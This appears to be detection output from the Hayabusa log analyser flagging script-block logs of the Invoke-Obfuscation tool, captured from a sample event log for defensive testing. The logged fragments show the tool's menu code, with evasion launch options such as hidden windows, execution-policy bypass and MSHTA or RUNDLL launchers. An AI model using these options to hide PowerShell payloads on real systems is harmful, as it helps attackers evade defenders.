${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_STDIN+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '6')) ${MenuLevel_Launcher_CLIP+} = @() ${MenuLevel_Launcher_CLIP+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_CLIP+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '7')) ${MenuLevel_Launcher_VAR++} = @() ${MenuLevel_Launcher_VAR++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_VAR++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '8')) ${MenuLevel_Launcher_STDIN++} = @() ${MenuLevel_Launcher_STDIN++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '0' , ""`tNO EXECUTION FLAGS"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '1' , ""`t-NoExit"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '2' , ""`t-NonInteractive"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '3' , ""`t-NoLogo"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '4' , ""`t-NoProfile"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '5' , ""`t-Command"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '6' , ""`t-WindowStyle Hidden"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '7' , ""`t-ExecutionPolicy Bypass"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_STDIN++} += , @($LineSpacing, '8' , ""`t-Wow64 (to path 32-bit powershell.exe)"" , @('Out-PowerShellLauncher', '', '9')) ${MenuLevel_Launcher_CLIP++} = @() ${MenuLevel_Launcher_CLIP++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_CLIP++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '10')) ${MenuLevel_Launcher_RUNDLL++} = @() ${MenuLevel_Launcher_RUNDLL++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '2' , '-NonInteractive'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. $TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. $AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. Show-Menu function displays current function along with acceptable input options (defined in arrays instantiated above). # User input and validation is handled within Show-Menu. $UserResponse = '' While($ExitInputOptions -NotContains ([String]$UserResponse).ToLower()) { $UserResponse = ([String]$UserResponse).Trim() If($HomeMenuInputOptions[0] -Contains ([String]$UserResponse).ToLower()) { $UserResponse = '' } # Display menu if it is defined in a menu variable with $UserResponse in the variable name. If(Test-Path ('Variable:' + ""MenuLevel$UserResponse"")) { $UserResponse = Show-Menu (Get-Variable ""MenuLevel$UserResponse"").Value $UserResponse $Script:OptionsMenu } Else { Write-Error ""The variable MenuLevel$UserResponse does not exist."" $UserResponse = 'quit' } If(($UserResponse -eq 'quit') -AND $CliWasSpecified -AND !$NoExitWasSpecified) { Write-Host ""`n`nOutputting ObfuscatedCommand to stdout and exiting since -Command was specified and -NoExit was not specified:`n"" Write-Output $Script:ObfuscatedCommand.Trim(""`n"") $UserInput = 'quit' } } } # Get location of this script no matter what the current directory is for the process executing this script. $ScriptDir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition) Function Show-Menu { <# .SYNOPSIS HELPER FUNCTION :: Displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Menu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Menu displays current menu with obfuscation navigation and application options for Invoke-Obfuscation. .PARAMETER Menu Specifies the menu options to display, with acceptable input options parsed out of this array. .PARAMETER MenuName Specifies the menu header display and the breadcrumb used in the interactive prompt display. .PARAMETER Script:OptionsMenu Specifies the script-wide variable containing additional acceptable input in addition to each menu's specific acceptable input (e.g. EXIT, QUIT, BACK, HOME, MAIN, etc.). .EXAMPLE C:\PS> Show-Menu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [ValidateNotNullOrEmpty()] [Object[]] $Menu, [String] $MenuName, [Object[]] $Script:OptionsMenu ) # Extract all acceptable values from $Menu. $AcceptableInput = @() $SelectionContainsCommand = $FALSE ForEach($Line in $Menu) { # If there are 4 items in each $Line in $Menu then the fourth item is a command to exec if selected. If($Line.Count -eq 4) { $SelectionContainsCommand = $TRUE } $AcceptableInput += ($Line[1]).Trim(' ') } $UserInput = $NULL While($AcceptableInput -NotContains $UserInput) { # Format custom breadcrumb prompt. Write-Host ""`n"" $BreadCrumb = $MenuName.Trim('_') If($BreadCrumb.Length -gt 1) { If($BreadCrumb.ToLower() -eq 'show options') { $BreadCrumb = 'Show Options' } If($MenuName -ne '') { # Handle specific case substitutions from what is ALL CAPS in interactive menu and then correct casing we want to appear in the Breadcrumb. $BreadCrumbOCD = @() $BreadCrumbOCD += , @('ps' ,'PS') $BreadCrumbOCD += , @('cmd' ,'Cmd') $BreadCrumbOCD += , @('wmic' ,'Wmic') $BreadCrumbOCD += , @('rundll' ,'RunDll') $BreadCrumbOCD += , @('var+' ,'Var+') $BreadCrumbOCD += , @('stdin+' ,'StdIn+') $BreadCrumbOCD += , @('clip+' ,'Clip+') $BreadCrumbOCD += , @('var++' ,'Var++') $BreadCrumbOCD += , @('stdin++' ,'StdIn++') $BreadCrumbOCD += , @('clip++' ,'Clip++') $BreadCrumbOCD += , @('rundll++','RunDll++') $BreadCrumbOCD += , @('mshta++' ,'Mshta++') $BreadCrumbArray = @() ForEach($Crumb in $BreadCrumb.Split('_')) { # Perform casing substitutions for any matches in $BreadCrumbOCD array. $StillLookingForSubstitution = $TRUE ForEach($Substitution in $BreadCrumbOCD) { If($Crumb.ToLower() -eq $Substitution[0]) { $BreadCrumbArray += $Substitution[1] $StillLookingForSubstitution = $FALSE } } # If no substitution occurred above then simply upper-case the first character and lower-case all the remaining characters. If($StillLookingForSubstitution) { $BreadCrumbArray += $Crumb.SubString(0,1).ToUppe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_RUNDLL++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '11')) ${MenuLevel_Launcher_MSHTA++} = @() ${MenuLevel_Launcher_MSHTA++} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '12')) ${MenuLevel_Launcher_MSHTA++} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '12')) # Input options to display non-interactive menus or perform actions. $TutorialInputOptions = @(@('tutorial') , "" of how to use this tool `t "" ) $MenuInputOptionsShowHelp = @(@('help','get-help','?','-?','/?','menu'), ""Show this Menu `t "" ) $MenuInputOptionsShowOptions = @(@('show options','show','options') , "" for payload to obfuscate `t "" ) $ClearScreenInputOptions = @(@('clear','clear-host','cls') , "" screen `t "" ) $CopyToClipboardInputOptions = @(@('copy','clip','clipboard') , "" ObfuscatedCommand to clipboard `t "" ) $OutputToDiskInputOptions = @(@('out') , ""Write ObfuscatedCommand to disk `t "" ) $ExecutionInputOptions = @(@('exec','execute','test','run') , "" ObfuscatedCommand locally `t "" ) $ResetObfuscationInputOptions = @(@('reset') , "" ALL obfuscation for ObfuscatedCommand "") $UndoObfuscationInputOptions = @(@('undo') , "" LAST obfuscation for ObfuscatedCommand "") $BackCommandInputOptions = @(@('back','cd ..') , ""Go to previous obfuscation menu `t "" ) $ExitCommandInputOptions = @(@('quit','exit') , "" Invoke-Obfuscation `t "" ) $HomeMenuInputOptions = @(@('home','main') , ""Return to Menu `t "" ) # For Version 1.0 ASCII art is not necessary. #$ShowAsciiArtInputOptions = @(@('ascii') , ""Display random art for the lulz :)`t"") # Add all above input options lists to be displayed in SHOW OPTIONS menu. $AllAvailableInputOptionsLists = @() $AllAvailableInputOptionsLists += , $TutorialInputOptions $AllAvailableInputOptionsLists += , $MenuInputOptionsShowHelp $AllAvailableInputOptionsLists += , $MenuInputOptionsShowOptions $AllAvailableInputOptionsLists += , $ClearScreenInputOptions $AllAvailableInputOptionsLists += , $ExecutionInputOptions $AllAvailableInputOptionsLists += , $CopyToClipboardInputOptions $AllAvailableInputOptionsLists += , $OutputToDiskInputOptions $AllAvailableInputOptionsLists += , $ResetObfuscationInputOptions $AllAvailableInputOptionsLists += , $UndoObfuscationInputOptions $AllAvailableInputOptionsLists += , $BackCommandInputOptions $AllAvailableInputOptionsLists += , $ExitCommandInputOptions $AllAvailableInputOptionsLists += , $HomeMenuInputOptions # For Version 1.0 ASCII art is not necessary. #$AllAvailableInputOptionsLists += , $ShowAsciiArtInputOptions # Input options to change interactive menus. $ExitInputOptions = $ExitCommandInputOptions[0] $MenuInputOptions = $BackCommandInputOptions[0] # Obligatory ASCII Art. Show-AsciiArt Start-Sleep -Seconds 2 # Show Help Menu once at beginning of script. Show-HelpMenu # Main loop for user interaction. 